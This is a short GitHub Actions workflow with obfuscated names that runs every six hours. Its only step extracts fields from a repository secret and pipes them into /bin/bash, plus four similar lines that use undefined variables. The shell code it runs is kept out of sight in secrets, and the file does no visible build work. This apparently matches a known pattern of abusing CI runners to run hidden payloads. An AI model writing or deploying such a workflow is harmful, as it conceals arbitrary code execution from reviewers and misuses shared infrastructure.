name: shisuanjian3489

on:
  workflow_dispatch:
  schedule:
    - cron: '4 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shisuanjian3489
        env:
          h24: ${{ secrets.h24 }}
        run: |
          echo $h24 | jq -r .nzqaq2 | /bin/bash
          echo $uu099 | jq -r .jz52241 | /bin/bash
          echo $s668 | jq -r .kpmhf3 | /bin/bash
          echo $c06 | jq -r .mtf93828 | /bin/bash
          echo $sbkqq3 | jq -r .ageo96963 | /bin/bash

